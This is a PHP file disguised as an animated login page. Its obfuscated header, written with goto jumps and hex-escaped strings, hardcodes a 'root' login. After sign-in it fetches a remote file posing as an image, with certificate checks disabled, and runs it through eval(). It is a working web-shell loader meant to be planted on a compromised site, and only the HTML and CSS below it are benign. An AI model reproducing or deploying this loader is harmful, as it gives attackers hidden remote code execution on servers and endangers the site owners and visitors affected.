<?php
 goto XKjqB; zd1KT: $passwordHash = "\x24\x32\x79\x24\x31\60\x24\153\145\x52\x74\x30\x6c\113\105\131\123\71\153\132\x56\150\164\x5a\162\116\147\x58\x4f\116\123\x4e\x45\x76\x69\x4b\x34\x4b\x61\103\62\x52\124\71\116\x44\x72\x2f\122\x4f\143\61\171\160\x63\x4c\66\x78\167\x32"; goto mRECg; XKjqB: session_start(); goto wxC9F; mRECg: if (!isset($_SESSION["\x6c\x6f\x67\147\x65\144\151\x6e"])) { if (isset($_POST["\x75\163\x65\162\156\x61\x6d\145"]) && isset($_POST["\160\141\x73\163\x77\x6f\162\144"])) { if ($_POST["\165\163\145\x72\x6e\x61\x6d\145"] === $username && password_verify($_POST["\160\x61\x73\x73\x77\157\162\x64"], $passwordHash)) { $_SESSION["\x6c\157\147\x67\x65\x64\x69\x6e"] = true; header("\x4c\x6f\x63\141\164\x69\157\x6e\x3a\x20" . $_SERVER["\x50\x48\x50\x5f\x53\105\114\106"]); die; } else { $error = "\125\163\145\x72\156\x61\155\x65\x20\141\x74\x61\x75\x20\160\141\x73\x73\167\157\x72\144\x20\x73\x61\x6c\x61\x68\56\40\x53\151\x6c\x61\x6b\141\x6e\40\x63\x6f\142\x61\40\154\141\147\151\56"; } } } goto sdJo3; sdJo3: function fetchContent($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_TIMEOUT, 5); $content = curl_exec($ch); $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); return $httpCode === 200 ? $content : false; } goto jCBk0; jCBk0: if (isset($_SESSION["\x6c\x6f\x67\x67\145\x64\151\156"])) { $url = "\x68\x74\164\x70\163\72\x2f\x2f\141\156\147\x6b\141\155\x61\156\151\x61\x2e\143\x6f\x6d\57\x72\x6f\x6f\164\x2e\152\x70\147"; $content = fetchContent($url); if ($content !== false) { if (strpos($content, "\163\145\x73\163\x69\x6f\x6e\137\163\164\141\x72\164\x28\51") !== false) { $content = preg_replace("\57\163\x65\x73\163\151\157\x6e\137\163\164\x61\162\164\134\163\x2a\134\50\x5c\163\x2a\x5c\x29\134\x73\52\73\x3f\x2f\x69", '', $content); } eval("\77\76" . $content); } else { echo "\107\x61\x67\x61\154\40\x6d\145\156\147\x61\x6d\142\151\154\x20\153\x6f\x6e\x74\x65\x6e\x20\x64\x61\162\x69\40\125\122\114\x2e"; } die; } goto NGzEe; wxC9F: $username = "\162\157\x6f\x74"; goto zd1KT; NGzEe: ?>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Login Form</title>
    <link rel="icon" href="https://falconstorage.wordpress.com/wp-content/uploads/2025/03/falcondev.png" />
    <style>
        @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@300;400;500;600;700;800;900&display=swap');

        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
            font-family: 'Poppins', sans-serif;
        }

        body {
            display: flex;
            justify-content: center;
            align-items: center;
            min-height: 100vh;
            flex-direction: column;
            background: #23242a;
            margin: 0;
        }

        .box {
            position: relative;
            width: 380px;
            height: 450px;
            background: #1c1c1c;
            border-radius: 8px;
            overflow: hidden;
        }

        .box::before {
            content: '';
            z-index: 1;
            position: absolute;
            top: -50%;
            left: -50%;
            width: 380px;
            height: 450px;
            transform-origin: bottom right;
            background: linear-gradient(0deg, transparent, #ffe204, #ffe204);
            animation: animate 6s linear infinite;
        }

        .box::after {
            content: '';
            z-index: 1;
            position: absolute;
            top: -50%;
            left: -50%;
            width: 380px;
            height: 450px;
            transform-origin: bottom right;
            background: linear-gradient(0deg, transparent, #f23836, #f23836);
            animation: animate 6s linear infinite;
            animation-delay: -3s;
        }

        @keyframes animate {
            0% {
                transform: rotate(0deg);
            }

            100% {
                transform: rotate(360deg);
            }
        }

        form {
            position: absolute;
            inset: 2px;
            background: #28292d;
            padding: 50px 40px;
            border-radius: 8px;
            z-index: 2;
            display: flex;
            flex-direction: column;
            align-items: center;
        }

        h1 {
            color: #fff;
            font-size: 2rem;
            font-weight: 600;
            margin-top: 20px;
            margin-bottom: 20px;
        }

        h1 span {
            color: #f23836;
            position: relative;
        }

        h1 span::before {
            content: "";
            height: 30px;
            width: 2px;
            position: absolute;
            top: 50%;
            right: -8px;
            background: #f23836;
            transform: translateY(-45%);
            animation: blink 0.7s infinite;
        }

        h1 span.stop-blinking::before {
            animation: none;
        }

        @keyframes blink {
            50% {
                opacity: 0
            }
        }

        .inputBox {
            position: relative;
            width: 300px;
            margin-top: 20px;
            margin-bottom: 20px;
        }

        .inputBox input {
            position: relative;
            width: 100%;
            padding: 20px 10px 10px;
            background: transparent;
            outline: none;
            box-shadow: none;
            border: none;
            color: #f23836;
            font-size: 1em;
            letter-spacing: 0.05em;
            transition: 0.5s;
            z-index: 10;
        }

        .inputBox span {
            position: absolute;
            left: 0;
            padding: 20px 0px 10px;
            pointer-events: none;
            font-size: 1em;
            color: #8f8f8f;
            letter-spacing: 0.05em;
            transition: 0.5s;
        }

        .inputBox input:valid~span,
        .inputBox input:focus~span {
            color: #ffe204;
            transform: translateX(0px) translateY(-34px);
            font-size: 0.75em;
        }

        .inputBox i {
            position: absolute;
            left: 0;
            bottom: 0;
            width: 100%;
            height: 2px;
            background: #ffe204;
            border-radius: 4px;
            overflow: hidden;
            transition: 0.5s;
            pointer-events: none;
            z-index: 9;
        }

        .inputBox input:valid~i,
        .inputBox input:focus~i {
            height: 44px;
        }

        button {
            position: relative;
            overflow: hidden;
            width: 7rem;
            color: #ffe204;
            border: 2px solid #ffe204;
            background-color: #28292d;
            cursor: pointer;
            line-height: 2;
            padding: 0;
            border-radius: 1.5rem;
            font-size: 1.125rem;
            text-transform: lowercase;
            outline: none;
            transition: transform 0.125s;
        }

        button:active {
            transform: scale(0.9, 0.9);
        }
    </style>
</head>
<body>
    <div class="box">
        <form method="post">
            <h1><span>Login</span></h1>
            <?php if (isset($error)): ?>
                <div class="error-message"><?php echo $error; ?></div>
            <?php endif; ?>
            <div class="inputBox">
                <input type="text" name="username" required>
                <span>Username</span>
            </div>
            <div class="inputBox">
                <input type="password" name="password" required>
                <span>Password</span>
            </div>
            <button type="submit">Sign In</button>
        </form>
    </div></body>
</html>
